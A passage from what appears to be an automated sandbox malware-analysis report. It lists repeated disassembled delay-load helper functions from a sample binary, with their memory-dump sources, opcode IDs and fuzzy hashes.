                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 396bcfa92a0fe196c7821ea28a689f81966679d5d1696ed3492da661a9c88169
                                                            • Instruction ID: edee94691d796ad528893428a2677522cf17a26278b5359ce929b867b91ef96b
                                                            • Opcode Fuzzy Hash: 396bcfa92a0fe196c7821ea28a689f81966679d5d1696ed3492da661a9c88169
                                                            • Instruction Fuzzy Hash: FEB092A1298402AC32445184AC02C3F0128DB84B22330883BB914C5082DA4C8D490032
                                                            Function 0005F425 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: cdb544c7a0accb190c398791b4e8ebec4a197545d95508f0452bf655ea55ea41
                                                            • Instruction ID: feaf95d84ac989ca54b65a0597e681e58cb04f91a3cabf1b34b8f8742950c1a4
                                                            • Opcode Fuzzy Hash: cdb544c7a0accb190c398791b4e8ebec4a197545d95508f0452bf655ea55ea41
                                                            • Instruction Fuzzy Hash: 66B09291298402AC32445184AC02C3F0118DB84B22330C83BB914C5082EA488C4D0032
                                                            Function 0005F4E7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 22e9500e648e7019f9801c78d3215c1e224cdbd84568d463a725c6eb08721990
                                                            • Instruction ID: 2254cbc45bc129b1b21d7085d8c7578f370282431d9bae8c07983cac063bb533
                                                            • Opcode Fuzzy Hash: 22e9500e648e7019f9801c78d3215c1e224cdbd84568d463a725c6eb08721990
                                                            • Instruction Fuzzy Hash: 28B09291268402AC210411909C02C3B0118D7C4B12330883AF824940C29E4848090872
                                                            Function 0005F502 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a93a7d462e495bd672e10100cbc3d91a3c18a1c3aefcca2c59a15677e968fff4
                                                            • Instruction ID: 1f0ec598ce7a9c334e661e8adbad952b949563f2f48d48785103a284e5ea84e5
                                                            • Opcode Fuzzy Hash: a93a7d462e495bd672e10100cbc3d91a3c18a1c3aefcca2c59a15677e968fff4
                                                            • Instruction Fuzzy Hash: 68B0129136C4426C314451549D02C3F011CC7C8F13330C83BF918C81C1DE4C4C0A0972
                                                            Function 0005F50C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: f30f84a1ced322591fd44345468acac36c5bf9ff004f167d11f51fea73cef07a
                                                            • Instruction ID: 820a4454051cced7c57ce3db5da463b9fb5ffeeea666299b857f3a5d213ce75d
                                                            • Opcode Fuzzy Hash: f30f84a1ced322591fd44345468acac36c5bf9ff004f167d11f51fea73cef07a
                                                            • Instruction Fuzzy Hash: A6B0129136C4026D314451449C02D3F011CD7C8F13330883BF818C41C1DE4C4C090A72
                                                            Function 0005F520 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8164f595f85d969e3f6090e1d88e65bf13fddba074c0604919f39c565b4ad07c
                                                            • Instruction ID: 16f115c678df16f09ae2e3fd10dd08cbfcfe7b471739d4c871d414cd60726352
                                                            • Opcode Fuzzy Hash: 8164f595f85d969e3f6090e1d88e65bf13fddba074c0604919f39c565b4ad07c
                                                            • Instruction Fuzzy Hash: E4B092912689026C224451449C02C3B0118CBC8B123308A3AF818C41C19A4858490976
                                                            Function 0005F56D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F55A
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 313f2deef02f18027946a9bb8957b5e132e44119699a9d32fd712518f7acba7e
                                                            • Instruction ID: 7190d2e4f4cd633366f81da29178e4c0ec77852d83e4a34dda58342aa850293b
                                                            • Opcode Fuzzy Hash: 313f2deef02f18027946a9bb8957b5e132e44119699a9d32fd712518f7acba7e
                                                            • Instruction Fuzzy Hash: A8B012A125C9027D315452489C02D3F011CD7C0F133708C3BF915C4081ED4C4C490232
                                                            Function 0005F581 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F55A
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d4458862d47937fc14420cac9b94fc0c27d26ca6120329451d036d433479ab9c
                                                            • Instruction ID: c199b7b6316a60b0d4921852cae81dd1b1a6f437589e45fcbe8aeabd111e5582
                                                            • Opcode Fuzzy Hash: d4458862d47937fc14420cac9b94fc0c27d26ca6120329451d036d433479ab9c
                                                            • Instruction Fuzzy Hash: 1CB012A135C9026C3144524CDD02D3F012CC7C4F133708E3BF915C8081ED8C4D4A0136
                                                            Function 0005F58B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F55A
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 84ecc3880a1f6779820f13671da34ab804ac4a21383a3eacd38dbd77c3dcab5f
                                                            • Instruction ID: d4c452935a243781d0f9a1af383e6afb3d7345f7eca6423dae9839e92f27ea92
                                                            • Opcode Fuzzy Hash: 84ecc3880a1f6779820f13671da34ab804ac4a21383a3eacd38dbd77c3dcab5f
                                                            • Instruction Fuzzy Hash: C8B012A125CA027C3184524CDC02D3F012CC7C4F133308E3BF915C4081ED4C4C890136
                                                            Function 0005FBA8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005FBBA
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: cc6b993a7d442d87fa38530c9f675aebc1ec802b311f287ccb55d2307cda23d5
                                                            • Instruction ID: 09d370f7049323c732ea55c3bcac030afee705212b2b296dd8e35001ebd6a288
                                                            • Opcode Fuzzy Hash: cc6b993a7d442d87fa38530c9f675aebc1ec802b311f287ccb55d2307cda23d5
                                                            • Instruction Fuzzy Hash: 76B012A225E802BD36141140DD06C3F011CC7C0F63330C83BFE11CC0819A4C4C4A0031
                                                            Function 0005F1F3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 16f87fe30a6f4aedbd8098796655f036ef119b9b951679251874ae0ab4b2db87
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: 16f87fe30a6f4aedbd8098796655f036ef119b9b951679251874ae0ab4b2db87
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            Function 0005F239 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 10f261f72ac4b6f1979d9aa6f8974e56e03140bbf818769ec84a2cca83becbc8
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: 10f261f72ac4b6f1979d9aa6f8974e56e03140bbf818769ec84a2cca83becbc8
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            Function 0005F257 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a4e63e917b55349531b244367d300124c2543ead7796ffce5414af603e396365
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: a4e63e917b55349531b244367d300124c2543ead7796ffce5414af603e396365
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            Function 0005F26B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 85d76915eb73fa7432b861f67c7541e288f92984d4da60abcf2d375d5a721e47
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: 85d76915eb73fa7432b861f67c7541e288f92984d4da60abcf2d375d5a721e47
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            Function 0005F275 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 71018802a48f30f4a8365f818d710f4445d6054e126e2143e4869c84be198beb
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: 71018802a48f30f4a8365f818d710f4445d6054e126e2143e4869c84be198beb
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            Function 0005F27F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
